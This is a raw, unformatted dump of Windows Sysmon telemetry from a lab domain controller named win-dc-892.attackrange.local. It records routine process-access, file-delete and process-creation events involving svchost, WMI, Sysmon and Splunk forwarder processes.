12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FFA4B0C15636092E9C834AA4026664E9,SHA256=B58597776FC71E285816E01AFA37FDCA709FE4260C854FD749C884FE56D83B31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.928{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A235A7E4B71BD97BBAB748987099CF,SHA256=47638AC655C8E043FF1D6C8AC173FEB9A395A83CDFBAB9BDBE1C5828520C49C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FA2997C748A12903B902DB4BA13A31B5,SHA256=B7E15E9BBFFAB09BC1D05F7EEC868A6865034BC1C0B75486B804D890B29094F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 